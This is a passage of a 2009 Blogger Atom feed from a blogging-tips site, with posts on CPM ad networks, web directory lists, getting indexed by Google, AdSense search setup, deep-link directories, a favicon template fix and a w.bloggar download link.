src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3400151538690561389</id><published>2009-07-26T10:15:00.039-07:00</published><updated>2009-07-26T10:15:46.503-07:00</updated><title type='text'>Dose CPM ad network for websites having low traffic works ?</title><content type='html'>It is difficult to search CPM ad network for websites having low traffic.&lt;br /&gt;&lt;br /&gt;For those sites which have low traffic , it is good to look out for newest CPM network . These new networks requires low traffics.&lt;br /&gt;&lt;br /&gt;e.g.&lt;br /&gt;&lt;br /&gt;1. ADSDAQ&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_exchange_contextweb_com_');" href="http://exchange.contextweb.com/" target="_blank"&gt;ADSDAQ Online Advertising Exchange from ContextWeb&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Ad Dynamix&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_addynamix_com_');" href="http://www.addynamix.com/" target="_blank"&gt;AdDynamix&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can look for newest CPM ad networks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3400151538690561389?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3400151538690561389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3400151538690561389' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3400151538690561389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3400151538690561389'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/dose-cpm-ad-network-for-websites-having.html' title='Dose CPM ad network for websites having low traffic works ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7276850461611320066</id><published>2009-07-26T10:15:00.037-07:00</published><updated>2009-07-26T10:15:45.498-07:00</updated><title type='text'>List of some good web directories for your blog website</title><content type='html'>Here I am giving list of directories for  blog website with good &lt;acronym title="Google Page Ranking"&gt;PR&lt;/acronym&gt; .&lt;br /&gt;It will really work.&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_technorati_com_');" href="http://www.technorati.com/" target="_blank"&gt; Technorati &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_boingboing_net');" href="http://www.boingboing.net/" target="_blank"&gt; boingboing&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_globeofblogs_com_');" href="http://www.globeofblogs.com/" target="_blank"&gt; globeofblogs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_icerocket_com_');" href="http://www.icerocket.com/" target="_blank"&gt; icerocket&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_wordpress_org_extend_plugins_');" href="http://wordpress.org/extend/plugins/" target="_blank"&gt; Wordpress&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_blogged_com_');" href="http://www.blogged.com/" target="_blank"&gt; Blogged&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_lsblogs_com_');" href="http://www.lsblogs.com/" target="_blank"&gt; LSBlogs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_bloghop_com_');" href="http://www.bloghop.com/" target="_blank"&gt; BlogHop&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_blogcatalog_com_directory');" href="http://www.blogcatalog.com/directory" target="_blank"&gt; blogcatalog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_weblogalot_com_');" href="http://www.weblogalot.com/" target="_blank"&gt; WeBlogALot&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;These all are free and have high page rank.&lt;br /&gt;&lt;br /&gt;You can also try following directories-&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_ibiddir_com_blogs_');" href="http://www.ibiddir.com/blogs/" target="_blank"&gt;http://www.ibiddir.com/blogs/&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_mishre_com_Blogs_');" href="http://www.mishre.com/Blogs/" target="_blank"&gt;http://www.mishre.com/Blogs/&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_directorypro_biz_Internet_Blogs_');" href="http://www.directorypro.biz/Internet/Blogs/" target="_blank"&gt;http://www.directorypro.biz/Internet/Blogs/&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_bidyourweb_com_Blogs_');" href="http://www.bidyourweb.com/Blogs/" target="_blank"&gt;http://www.bidyourweb.com/Blogs/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Main article @&lt;a href="http://www.webmasters-forum.org/"&gt; www.webmasters-forum.org/&lt;br /&gt;&lt;br /&gt;&lt;/a&gt; You can also suggest more good  web directories&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7276850461611320066?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7276850461611320066/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7276850461611320066' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7276850461611320066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7276850461611320066'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/list-of-some-good-web-directories-for.html' title='List of some good web directories for your blog website'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2034359793098824222</id><published>2009-07-26T10:15:00.035-07:00</published><updated>2009-07-26T10:15:44.501-07:00</updated><title type='text'>Here are some fast technique for indexing a new site in google</title><content type='html'>One of the easy and successful method to get indexed in google is Social Bookmarking which can give results in hours. You can also do to put the link of your site to a site which already indexed. Promoting backlinks and google add url also helps.&lt;br /&gt;&lt;br /&gt;You can also try as to join forums and make some valuable threads / posts and that will help you. You can submit your posts / aricles to digg.com and it helps in faster indexing. Also submit Your Site in More and More Directory and Social Book marking sites like Delicious , Stumble etc.&lt;br /&gt;&lt;br /&gt;Google webmaster tool can also help.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2034359793098824222?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2034359793098824222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2034359793098824222' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2034359793098824222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2034359793098824222'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/here-are-some-fast-technique-for.html' title='Here are some fast technique for indexing a new site in google'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5048459231934696437</id><published>2009-07-26T10:15:00.033-07:00</published><updated>2009-07-26T10:15:43.517-07:00</updated><title type='text'>How to Add Adsense ads in Google search results ?</title><content type='html'>When you search on my site , a new page opens having search results , Plus it also have Adsense ads . Here I will explain how to Add Adsense ads in Google search results ?&lt;br /&gt;&lt;br /&gt;1. Login to &lt;a style="font-weight: bold;" href="https://www.google.com/adsense/home"&gt;Adsense  &lt;/a&gt;&lt;span style="font-weight: bold;"&gt;&gt; Get Ads &gt; Adsense for Search&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:times new roman;font-size:100%;"  &gt;2.In &lt;span class="Apple-style-span" style="border-collapse: collapse; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: bold; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-size:13;" &gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;Search type&lt;/span&gt; option choose &lt;span style="font-weight: bold;"&gt;Only sites I Select&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;3.In &lt;span style="font-weight: bold;"&gt;Selected Sites&lt;/span&gt; option &lt;span style="font-weight: bold;"&gt;add URL of your site&lt;/span&gt;. In &lt;span style="font-weight: bold;"&gt;optional keywords, add some keywords &lt;/span&gt;that can describe your site. Now go to bottom and click Continue.&lt;br /&gt;&lt;br /&gt;4.Now choose search box type using Look and Feel. You can also modify text box leanth. Click Continue.&lt;br /&gt;&lt;br /&gt;5.Then from &lt;span style="font-weight: bold;"&gt;Opening of search results page&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: collapse; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:arial;font-size:13;"  &gt;&lt;span class="Apple-converted-space"&gt; &lt;/span&gt;&lt;/span&gt;choose &lt;span style="font-weight: bold;"&gt;open results on Google in a new window. &lt;/span&gt;And Click on Continue.&lt;br /&gt;&lt;br /&gt;6.In &lt;span style="font-weight: bold;"&gt;Name your Search Engine option&lt;/span&gt; give any attractive name related to your site. Click on &lt;span style="font-weight: bold;"&gt;Submit and get Code.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;6.When you got the code, Copy it.&lt;br /&gt;&lt;br /&gt;7.Sign in Blogger &gt; Layout &gt; Page Elements &gt; Add a Gadget &gt; HTML / Java Script . Now Paste that adsense code here and Save . Refresh your website and check it for search.&lt;br /&gt;&lt;span class="Apple-style-span" style="border-collapse: collapse; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:arial;font-size:13;"  &gt;&lt;span class="Apple-converted-space"&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5048459231934696437?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5048459231934696437/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5048459231934696437' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5048459231934696437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5048459231934696437'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-adsense-ads-in-google-search.html' title='How to Add Adsense ads in Google search results ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-429431989775491406</id><published>2009-07-26T10:15:00.031-07:00</published><updated>2009-07-26T10:15:42.545-07:00</updated><title type='text'>How deep linking works and list of some deep link directories.</title><content type='html'>&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:100%;"  &gt;&lt;span style="font-weight: bold;"&gt;What is Deep link ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Deep linking is , making a hyperlink to a webpage or image on another website . other than the homepage of that website. Following is the example-&lt;br /&gt;&lt;br /&gt;http://free-blogger-help.blogspot.com/2008/11/how-to-add-adsense-ads-in-google-search.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Above is the deep links of the post &lt;a href="http://free-blogger-help.blogspot.com/2008/11/how-to-add-adsense-ads-in-google-search.html"&gt;How to Add Adsense ads in Google search results ?&lt;/a&gt; from this site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How deep linking works ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In detail, deep linking is the process of &lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(68, 68, 68); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:16;"  &gt;&lt;/span&gt;&lt;/span&gt;submitting inner pages of a website to other sites such as directories so that you can improve search engine rankings .&lt;span style="font-size:100%;"&gt;&lt;br /&gt;Here inner pages means that pages other than the Home Page .&lt;br /&gt;&lt;br /&gt;e.g.&lt;br /&gt;&lt;br /&gt;Home Page is &lt;a href="http://free-blogger-help.blogspot.com/"&gt;http://free-blogger-help.blogspot.com/&lt;/a&gt;&lt;br /&gt;Inner page is &lt;a href="http://free-blogger-help.blogspot.com/2008/10/dose-cpm-ad-network-for-websites-having.html"&gt;http://free-blogger-help.blogspot.com/2008/10/dose-cpm-ad-network-for-websites-having.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;List of some deep link directories.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:100%;"  &gt;&lt;br /&gt;To get benefit from this you have to submit these inner pages to the deep link directories .&lt;br /&gt;&lt;br /&gt;So here is the list you can use-&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;a href="http://www.directorycritic.com/deep-links-directory-list.html"&gt;Deep Links Directory List - Directory Critic&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:100%;"  &gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_mingleon_com');" href="http://www.mingleon.com/" target="_blank" style="text-decoration: none;"&gt;MingleOn Web Directory*:: MingleOn.org&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_alivedirectory_com');" href="http://www.alivedirectory.com/" target="_blank" style="text-decoration: none;"&gt;Alive Web Directory - Internet Site Resources&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_uncoverthenet_com');" href="http://www.uncoverthenet.com/" target="_blank" style="text-decoration: none;"&gt;Uncover the Net - Web Directory &amp;amp; Search Engine&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_allshort_com');" href="http://www.allshort.com/" target="_blank" style="text-decoration: none;"&gt;AllShort Web Directory*&lt;/a&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_latestdirectory_com');" href="http://www.latestdirectory.com/" target="_blank" style="text-decoration: none;"&gt;Latest Directory&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(68, 68, 68); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:100%;"  &gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_buywebdirectories_com_');" href="http://www.buywebdirectories.com/" target="_blank" style="color: rgb(0, 0, 0); text-decoration: none;"&gt;100 Web Directories&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Some of above directories may be paid or free.&lt;br /&gt;&lt;br /&gt;---------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: times new roman;"&gt;Source - &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="www.webmasters-forum.org"&gt;&lt;span style="font-family: times new roman;"&gt;www.webmasters-forum.org&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://www.blogger.com/www.webmasters-forum.org"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:verdana;font-size:100%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-429431989775491406?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/429431989775491406/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=429431989775491406' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/429431989775491406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/429431989775491406'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-deep-linking-works-and-list-of-some.html' title='How deep linking works and list of some deep link directories.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4870990592053320218</id><published>2009-07-26T10:15:00.029-07:00</published><updated>2009-07-26T10:15:41.421-07:00</updated><title type='text'>iBusiness Promoter : a quick review</title><content type='html'>&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span style="font-family:georgia;"&gt;Some of my webmaster friends asks for&lt;/span&gt;&lt;a style="font-family: georgia;" href="http://ibusinesspromoter.com/"&gt; iBusiness Promoter&lt;/a&gt;&lt;span style="font-family:georgia;"&gt; and its efficiency .&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:georgia;"&gt;So here is a quick and easy to understand review of iBusiness Promoter.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:georgia;"&gt;iBusiness Promoter is a SEO expert , who provides various tools and by using these tools your website can get position in top 10 search results for a given keyword. I&lt;/span&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:georgia;font-size:16;"  &gt;&lt;/span&gt;&lt;/span&gt;t also has money back guaranty. You can try the free version first (but it do not have the all tools)&lt;br /&gt;&lt;br /&gt;They offer step by step guide of tasks  and tools to complete those tasks and this helps in obtaining good search ranking and improve your websites popularity.&lt;br /&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(68, 68, 68); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;font-family:webdings;font-size:13;"  &gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_ibusinesspromoter_com_');" href="http://ibusinesspromoter.com/" target="_blank" style="color: rgb(154, 10, 10); text-decoration: none;"&gt;&lt;span class="Apple-converted-space"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here are &lt;span style="font-weight: bold;"&gt;advantages of iBusiness Promoter&lt;/span&gt; -&lt;br /&gt;&lt;br /&gt;They analyze and optimize your website for keywords.&lt;br /&gt;They helps in search engine submission and also in link building.&lt;br /&gt;They also offer some unique tools like broken link checker, keyword density analyzer, search engine spider checker and so on.&lt;br /&gt;They offer help in directory submission.&lt;br /&gt;They help to improve your website's popularity.&lt;br /&gt;It gives money back guaranty.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Disadvantages of iBusiness Promoter&lt;/span&gt; -&lt;br /&gt;&lt;br /&gt;I did not find any.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Final verdict&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Try  iBusiness Promoter once as it has money  back guaranty&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4870990592053320218?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4870990592053320218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4870990592053320218' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4870990592053320218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4870990592053320218'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/ibusiness-promoter-quick-review.html' title='iBusiness Promoter : a quick review'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5805455512202295891</id><published>2009-07-26T10:15:00.027-07:00</published><updated>2009-07-26T10:15:40.560-07:00</updated><title type='text'>Get your missing / replaced favicon back !</title><content type='html'>Hey guys you have noticed that your blog/websites favicon is replaced by blogger favicon. You can get it back easily .&lt;br /&gt;&lt;br /&gt;What you have to do is to move your codes for the favicon from it original position in the template to just after ]]&gt; and just before ,. Look preview and save .&lt;br /&gt;&lt;br /&gt;This could look like as follows&lt;br /&gt;&lt;br /&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;!-- iconj.com dynamic favicon code --&amp;gt;&lt;br /&gt;&amp;lt;link href='http://www.iconj.com/favicon.php?user=manature' rel='shortcut icon' type='image/x-icon'/&amp;gt;&lt;br /&gt;&amp;lt;link href='http://www.iconj.com/favicon2.php?user=manature' rel='icon' type='image/gif'/&amp;gt;&lt;br /&gt;&amp;lt;!-- end of iconj.com dynamic favicon code --&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;.......&lt;br /&gt;&lt;br /&gt;Change favicon for old classic Blogger template&lt;br /&gt;If you are using the old classic Blogger template instead of the New Blogger xml template, go to blogger.com (Dashboard) &gt; template &gt; Edit HTML and look for&lt;br /&gt;&lt;br /&gt;&lt;$BlogMetaData$&gt;&lt;br /&gt;&lt;br /&gt;and paste the favicon codes immediately after &lt;$BlogMetaData$&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5805455512202295891?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5805455512202295891/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5805455512202295891' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5805455512202295891'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5805455512202295891'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/get-your-missing-replaced-favicon-back.html' title='Get your missing / replaced favicon back !'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6895146229741272124</id><published>2009-07-26T10:15:00.025-07:00</published><updated>2009-07-26T10:15:39.631-07:00</updated><title type='text'>w.bloggar review and download here</title><content type='html'>w.bloggar is a tool that can edit posts and template of blogger.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(68, 68, 68); font-family: verdana; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"&gt;&lt;/span&gt;This tool can be use to post, publish, edit and delete text and iamges  from various blog platforms like Blogger, BigBlogTool, MovableType, Nucleus, b2, and BlogWorks XML, or to any other blog tool or service that can support Blogger API system.&lt;br /&gt;&lt;br /&gt;It could be one of the useful tool for blogger's. W. Bloggar has some features and resources that the some browser based blog editors do not have.&lt;br /&gt;&lt;br /&gt;Download w.bloggar here from one of the link.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="border-collapse: separate; color: rgb(68, 68, 68); font-family: verdana; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_www_download_com_W_bloggar_3000_10247_4_10130318_html');" href="http://www.download.com/W-bloggar/3000-10247_4-10130318.html" target="_blank" style="color: rgb(154, 10, 10); text-decoration: none;"&gt;W.bloggar 3.03 download .com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onclick="pageTracker._trackPageview ('/outgoing/http_wbloggar_com_files_v403_wbportable_zip');" href="http://wbloggar.com/files/v403/wbportable.zip" target="_blank" style="color: rgb(154, 10, 10); text-decoration: none;"&gt;W.bloggar 3.03 official site&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;.............................................&lt;br /&gt;&lt;br /&gt;Source: http://www.webmasters-forum.org&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6895146229741272124?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6895146229741272124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6895146229741272124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6895146229741272124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6895146229741272124'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/wbloggar-review-and-download-here.html' 